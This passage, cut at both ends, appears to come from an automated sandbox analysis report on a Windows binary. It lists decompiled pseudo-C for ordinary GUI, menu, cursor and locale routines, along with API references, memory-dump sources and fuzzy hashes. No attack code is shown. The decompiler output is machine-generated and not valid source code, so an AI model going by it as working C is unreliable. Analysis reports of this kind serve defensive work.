								_t65 = E00408460(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x48fb84; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x48fb84; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x48fb84; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00436AFC(1);
					if( *0x48fb84 == 0) {
						goto L32;
					}
					_t102 =  *0x48fb84; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x48fb84; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x48fb84; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					_t11 = _t155 + 4; // 0x0
					 *((intOrPtr*)(_t104 + 0x10)) =  *_t11;
					_t65 = E00436AFC(0);
					if( *0x48fb84 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x48fb90; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x48fb9c; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x48fb94; // 0x0
				_t1 = _t155 + 4; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *_t1 ^ __edx) - __edx;
				_t166 = _t65 -  *0x48fb9c; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

0x00436bd2
0x00436bdb
0x00436c0a
0x00436c0a
0x00436c10
0x00436c26
0x00436c2f
0x00436c31
0x00436c38
0x00436c3a
0x00436c40
0x00436c4d
0x00436c52
0x00436c52
0x00436c38
0x00436c57
0x00436c63
0x00436c73
0x00436c7a
0x00436c7a
0x00436c7a
0x00436c7f
0x00436c65
0x00436c65
0x00436c6c
0x00436c6c
0x00436c86
0x00436c8e
0x00436cdb
0x00436cdb
0x00436ce2
0x00436ce5
0x00436ce8
0x00436ceb
0x00436cf4
0x00436cfc
0x00436d04
0x00436d09
0x00436d12
0x00436d19
0x00436d19
0x00436d1c
0x00436d27
0x00436d29
0x00436d2b
0x00436d35
0x00436d3e
0x00436d42
0x00436d4c
0x00436d51
0x00436d56
0x00436d5b
0x00436d5f
0x00436d7a
0x00436d7a
0x00436d7f
0x00436d84
0x00436d61
0x00436d61
0x00436d65
0x00436d6c
0x00436d6e
0x00436d73
0x00436d73
0x00436d8b
0x00436d8b
0x00436d90
0x00436d98
0x00436da5
0x00436da5
0x00436d42
0x00436dad
0x00436dba
0x00436dc6
0x00436e99
0x00436e99
0x00436dcc
0x00436dcc
0x00436dce
0x00436def
0x00436df1
0x00436df6
0x00436df9
0x00436dfb
0x00436e29
0x00436e38
0x00436e3d
0x00436e43
0x00436dfd
0x00436e05
0x00436e11
0x00436e16
0x00436e1c
0x00436e1c
0x00436dd0
0x00436dd0
0x00436dd3
0x00436dd6
0x00436de3
0x00436de3
0x00436e4d
0x00000000
0x00436e4f
0x00436e4f
0x00436e55
0x00436e58
0x00436e60
0x00436e67
0x00000000
0x00000000
0x00436e6e
0x00436e70
0x00436e77
0x00436e77
0x00436e7a
0x00436e81
0x00436e84
0x00436e8f
0x00436e90
0x00436e91
0x00436e92
0x00000000
0x00436e92
0x00436e4d
0x00436dc6
0x00436c92
0x00436c9e
0x00000000
0x00000000
0x00436ca4
0x00436ca9
0x00436cac
0x00436cb4
0x00436cb7
0x00436cbe
0x00436cc1
0x00436cc4
0x00436cc9
0x00436cd5
0x00000000
0x00000000
0x00000000
0x00436cd5
0x00436bdd
0x00436be4
0x00436be9
0x00436bef
0x00000000
0x00000000
0x00436bf1
0x00436bf6
0x00436bf9
0x00436bfc
0x00436bfe
0x00436c04
0x00000000
0x00000000
0x00000000

APIs

GetDesktopWindow.USER32 ref: 00436C40
GetDesktopWindow.USER32 ref: 00436D65
SetCursor.USER32(00000000), ref: 00436DBA

Part of subcall function 00440E7C: 73451770.COMCTL32(00000000,?,00436D95), ref: 00440E98
Part of subcall function 00440E7C: ShowCursor.USER32(000000FF,00000000,?,00436D95), ref: 00440EB3

SetCursor.USER32(00000000), ref: 00436DA5

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$DesktopWindow$73451770Show
String ID:
API String ID: 3513720257-0
Opcode ID: 107cde6ce86ada54e90c63d77bcd6d59792109bb451dcae293a6d7a000fa4dc9
Instruction ID: e57e7b251c3f88b75509248d867a3284fc81820a4deebc4aab082f42d04da392
Opcode Fuzzy Hash: 107cde6ce86ada54e90c63d77bcd6d59792109bb451dcae293a6d7a000fa4dc9
Instruction Fuzzy Hash: D0915878201202DFC300DF69D9A5A0A7BE1AB88364F55D97EE8448B362D778FC59CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0045311C, Relevance: 6.1, APIs: 4, Instructions: 148
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0045311C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x4532e2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0044C3E0(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E0041BDFC(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043F674(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043F370(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043F674(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043F370(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043F674(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E0043F370(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043F370(_t92), _t70);
								}
								E0044C3E0(_t113, E0043F370(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E004541DC(_t92, 1);
							}
							E00453054(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x4532e9);
							return E00404320( &_v20);
						}
					}
				}
				_t77 =  *0x48fc00; // 0x21d0f1c
				_t79 = E004568A0(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x48fc00; // 0x21d0f1c
						if(_t113 ==  *((intOrPtr*)(E0045688C(_t81, _t111) + 0x248))) {
							_t83 =  *0x48fc00; // 0x21d0f1c
							if(_t92 != E0045688C(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x48e554; // 0x41d314
								E00406520(_t87,  &_v20);
								E0040A124(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403D80();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}

0x0045311c
0x00453124
0x00453127
0x0045312a
0x0045312c
0x00453130
0x00453131
0x00453136
0x00453139
0x0045313e
0x004531b0
0x004531b0
0x004531b8
0x004531bc
0x004531bc
0x004531c5
0x004531d1
0x004531d1
0x004531d3
0x004531db
0x004531e1
0x004531e1
0x004531e8
0x0045329b
0x004532a0
0x004532a2
0x004532ae
0x004532ae
0x00000000
0x00453201
0x0045320b
0x0045321a
0x00453274
0x0045327b
0x0045327f
0x00453284
0x00453286
0x00453292
0x00453292
0x00453286
0x00000000
0x0045327b
0x00000000
0x0045321c
0x0045321c
0x00453225
0x00453233
0x00453236
0x00453240
0x00453245
0x00453247
0x00453251
0x0045325d
0x0045325d
0x0045326d
0x0045326d
0x004532b3
0x004532ba
0x004532c0
0x004532c0
0x004532c7
0x004532ce
0x004532d1
0x004532d4
0x004532e1
0x004532e1
0x0045320b
0x004531e8
0x00453140
0x0045314a
0x0045314d
0x00453150
0x00453153
0x00453155
0x00453157
0x00453167
0x0045316b
0x00453177
0x0045317c
0x0045317f
0x0045318c
0x00453191
0x004531a0
0x004531a5
0x004531a5
0x00453177
0x004531aa
0x004531ab
0x004531ab
0x004531ab
0x00453155

APIs

GetMenu.USER32(00000000), ref: 00453240
SetMenu.USER32(00000000,00000000), ref: 0045325D
SetMenu.USER32(00000000,00000000), ref: 00453292
SetMenu.USER32(00000000,00000000,00000000,004532E2), ref: 004532AE

Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadString
String ID:
API String ID: 3688185913-0
Opcode ID: 9897cc063449ae346f8935cf2211b3271d24f5cbc7803ed3d81050d3e1ac4619
Instruction ID: ef5aa86cf18416494199696bb31c19ba7e536e215e108b4ec80f9efbf203ed25
Opcode Fuzzy Hash: 9897cc063449ae346f8935cf2211b3271d24f5cbc7803ed3d81050d3e1ac4619
Instruction Fuzzy Hash: 5C51D130A04A005BDB10AF7AC88575A7794AF0538AF0845BBFC059B3A7CA7CDE4D879C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADDC, Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADDC() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x48f7f0 = 0x409;
				 *0x48f7f4 = 9;
				 *0x48f7f8 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x48f7f0 = _t14;
				}
				if(_t14 != 0) {
					 *0x48f7f4 = _t14 & 0x3ff;
					 *0x48f7f8 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x4710c0, 0x40af30, 8 << 2);
				if( *0x4710ac != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x48f7fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x48f7fc = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040AD64(__eflags, _t49);
					}
				} else {
					_t20 = E0040ADC4();
					if(_t20 != 0) {
						 *0x48f7fd = 0;
						 *0x48f7fc = 0;
						return _t20;
					}
					E0040AD64(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E004030F8(0x4710c0, 0x20, 0x40af30);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x48f7fc = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x48f7fd = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x48f7f0; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x48f7fd = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}

0x0040ade8
0x0040adf2
0x0040adfc
0x0040ae06
0x0040ae0d
0x0040ae0f
0x0040ae0f
0x0040ae17
0x0040ae23
0x0040ae2f
0x0040ae2f
0x0040ae43
0x0040ae4c
0x0040aefb
0x0040af00
0x0040af05
0x0040af0c
0x0040af11
0x0040af13
0x0040af16
0x0040af1c
0x0040af1e
0x00000000
0x0040af26
0x0040ae52
0x0040ae52
0x0040ae59
0x0040ae5b
0x0040ae62
0x00000000
0x0040ae62
0x0040ae6f
0x0040ae7f
0x0040ae81
0x0040ae86
0x0040ae89
0x0040ae8f
0x0040ae91
0x0040ae93
0x00000000
0x0040ae93
0x0040ae9f
0x0040aea4
0x0040aeaa
0x0040aeaa
0x0040aeac
0x0040aead
0x0040aeae
0x0040aeae
0x0040aeca
0x0040aed0
0x0040aed5
0x0040aeda
0x0040aee0
0x0040aee0
0x0040aee4
0x0040aee7
0x0040aeed
0x0040aeef
0x00000000
0x00000000
0x0040aef1
0x0040aef4
0x0040aef4
0x0040aef5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040aef5
0x0040aee0
0x0040af2d
0x0040af2d
0x00000000

APIs

GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AED0
GetThreadLocale.KERNEL32 ref: 0040AE06

Part of subcall function 0040AD64: GetCPInfo.KERNEL32(00000000,?), ref: 0040AD7D

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: 16fbb727b208b623c8bdcd3b9acaca1d40a6624352cfca4efcb5ab8f3ec5d5ab
Instruction ID: 113102de598c33981c5aa76e4e277ee6f130da3c2bc8c5497194bd1892756a66
Opcode Fuzzy Hash: 16fbb727b208b623c8bdcd3b9acaca1d40a6624352cfca4efcb5ab8f3ec5d5ab
Instruction Fuzzy Hash: FA31E4715403938AE3109B25A801BAA3795EB51349F28847FE884EB3D6D63C4869C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 0042358C, Relevance: 6.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0042358C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E0041FF00(_v8);
					_push(_t84);
					_push(0x42366b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E004248A8( *((intOrPtr*)(_v8 + 0x58)));
					E00423408( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E00424A88( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L00406A60();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00406BD8();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00406BA8();
					}
					E004202C4(_v8, _t66);
					_t58 =  *0x471788; // 0x21d0b74
					E00414410(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x423672);
					return E00420118(_v8);
				}
			}

0x0042358d
0x0042358f
0x00423592
0x00423595
0x0042359c
0x00423676
0x004235a2
0x004235a5
0x004235ac
0x004235ad
0x004235b2
0x004235b5
0x004235be
0x004235cf
0x004235da
0x004235df
0x004235e1
0x004235e6
0x004235f1
0x004235f6
0x0042360c
0x004235f8
0x00423602
0x00423602
0x00423615
0x00423618
0x0042361d
0x0042363b
0x0042361f
0x0042361f
0x00423621
0x00423622
0x00423623
0x0042362b
0x0042362e
0x0042362f
0x0042362f
0x00423643
0x0042364b
0x00423650
0x00423657
0x0042365a
0x0042365d
0x0042366a
0x0042366a

APIs

Part of subcall function 0041FF00: RtlEnterCriticalSection.KERNEL32(0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF08
Part of subcall function 0041FF00: RtlLeaveCriticalSection.KERNEL32(0048FA5C,0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF15
Part of subcall function 0041FF00: RtlEnterCriticalSection.KERNEL32(00000038,0048FA5C,0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF1E

Part of subcall function 00424A88: 72E7AC50.USER32(00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424ADE
Part of subcall function 00424A88: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AF3
Part of subcall function 00424A88: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AFD
Part of subcall function 00424A88: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B21
Part of subcall function 00424A88: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B2C

72E7A590.GDI32(00000000,00000000,0042366B), ref: 004235E1
SelectObject.GDI32(00000000,?), ref: 004235FA
72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,0042366B), ref: 00423623
72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,0042366B), ref: 0042362F

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
String ID:
API String ID: 2198039625-0
Opcode ID: 30344f0a0579ef1c609a1f93d395873c2d0553da271663b7eb091042a8abccf7
Instruction ID: 4b527bdc50dd53449b6d4a18d3a84c12d955e69430b9cd1e95e9cb5721807436
Opcode Fuzzy Hash: 30344f0a0579ef1c609a1f93d395873c2d0553da271663b7eb091042a8abccf7
Instruction Fuzzy Hash: 69312874B00624EFC714EF59D981D5DB7F9EF48710BA241A6A804AB362C638EE41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044C7CC, Relevance: 6.1, APIs: 4, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044C7CC(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044BED8(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0044BD54(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0044BD54(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408C34(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408B78(_a12, _t49);
				}
			}

0x0044c7d3
0x0044c7d5
0x0044c7d7
0x0044c7e2
0x00000000
0x0044c866
0x0044c7e6
0x0044c7f6
0x0044c813
0x0044c818
0x0044c81d
0x0044c82a
0x0044c82a
0x0044c7f8
0x0044c7ff
0x0044c80c
0x0044c80c
0x0044c831
0x00000000
0x0044c833
0x0044c836
0x0044c845
0x00000000
0x0044c84d

APIs

GetMenuState.USER32 ref: 0044C7EF
GetSubMenu.USER32 ref: 0044C7FA
GetMenuItemID.USER32(?,?), ref: 0044C813
GetMenuStringA.USER32(?,?,?,?,?), ref: 0044C866

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: 5569887cdee20bc3490367aef116df7d1ba987bbf72b6eb07c89aecd37be188b
Instruction ID: da32e46d8a0416a672ed07a52e386dbb6f14a8052f38ecc0b14f60d6c126561f
Opcode Fuzzy Hash: 5569887cdee20bc3490367aef116df7d1ba987bbf72b6eb07c89aecd37be188b
Instruction Fuzzy Hash: 44116071601214ABDB40EA6ECC859AF77E8DF49365B14446FF819D7382C638DD02D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0045E5A8, Relevance: 6.1, APIs: 4, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045E5A8(intOrPtr* __eax, int __ecx, RECT* __edx) {
				int _t9;
				int _t12;
				int _t26;
				int _t34;
				int _t37;
				intOrPtr* _t43;
				int* _t44;

				_t37 = __ecx;
				_t44 = __edx;
				_t43 = __eax;
				_t9 = IsRectEmpty(__edx);
				_t47 = _t9;
				if(_t9 != 0) {
					return E0045E540(_t43, _t47);
				}
				 *((intOrPtr*)( *_t43 + 0x94))();
				__eflags = _t37;
				if(_t37 != 0) {
					L5:
					_t12 = 1;
				} else {
					_t34 = IsWindowVisible(E0043F370(_t43));
					__eflags = _t34;
					if(_t34 == 0) {
						goto L5;
					} else {
						_t12 = 0;
					}
				}
				E0045E4BC(_t43);
				SetWindowPos(E0043F370(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
				 *((intOrPtr*)( *_t43 + 0xf8))();
				__eflags = _t12;
				if(__eflags != 0) {
					E0045E4BC(_t43);
				}
				_t26 = E004037B0( *((intOrPtr*)(_t43 + 0x240)), __eflags);
				__eflags = _t26;
				if(_t26 != 0) {
					return SetFocus(E0043F370(_t43));
				}
				return _t26;
			}

0x0045e5ac
0x0045e5ae
0x0045e5b0
0x0045e5b3
0x0045e5b8
0x0045e5ba
0x00000000
0x0045e5be
0x0045e5cc
0x0045e5d2
0x0045e5d4
0x0045e5eb
0x0045e5eb
0x0045e5d6
0x0045e5de
0x0045e5e3
0x0045e5e5
0x00000000
0x0045e5e7
0x0045e5e7
0x0045e5e7
0x0045e5e5
0x0045e5f1
0x0045e616
0x0045e61f
0x0045e625
0x0045e627
0x0045e62b
0x0045e62b
0x0045e63a
0x0045e63f
0x0045e641
0x00000000
0x0045e64b
0x0045e654

APIs

IsRectEmpty.USER32 ref: 0045E5B3
IsWindowVisible.USER32(00000000), ref: 0045E5DE
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045E6BF,00463508), ref: 0045E616
SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045E6BF,00463508), ref: 0045E64B

Part of subcall function 0045E540: IsWindowVisible.USER32(00000000), ref: 0045E557
Part of subcall function 0045E540: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,004633B2,004633BA,?,?,0045ED10), ref: 0045E57E
Part of subcall function 0045E540: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,004633B2,004633BA,?,?,0045ED10), ref: 0045E59E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$FocusVisible$EmptyRect
String ID:
API String ID: 698668684-0
Opcode ID: 14e1499886c9f27febb4d14d3eab02fc1becde214b25d5b5069d799ce34c2cf0
Instruction ID: b077f73e833ef18e89054b9c36e6e2196da467bc578b186032647e198170e437
Opcode Fuzzy Hash: 14e1499886c9f27febb4d14d3eab02fc1becde214b25d5b5069d799ce34c2cf0
Instruction Fuzzy Hash: 5F1191703006016BC614BA7B8C81A6BA38D9F4534AB08456AFD58DB383EA2CED0A5359

Uniqueness

Uniqueness Score: -1.00%

Function 0042279C, Relevance: 6.1, APIs: 4, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042279C(int __eax, intOrPtr __ecx, void* __edx) {
				struct tagRECT _v32;
				int _t11;
				void* _t21;
				void* _t23;
				int _t26;
				void* _t30;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t36;

				_t11 = __eax;
				_v32.bottom = __ecx;
				_t30 = __edx;
				_t26 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
					_t33 =  *((intOrPtr*)( *__eax + 0x24))();
					_t36 = 0;
					if(_t33 != 0) {
						_push(0xffffffff);
						_push(_t33);
						_t23 = E00420244(__edx);
						_push(_t23);
						L00406BD8();
						_t36 = _t23;
						_push(E00420244(_t30));
						L00406BA8();
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t32 = _t30;
					_t35 = _t33;
					_v32.right = _v32.right - 1;
					_v32.bottom = _v32.bottom - 1;
					_t11 = PlayEnhMetaFile(E00420244(_t32),  *( *((intOrPtr*)(_t26 + 0x28)) + 8),  &_v32);
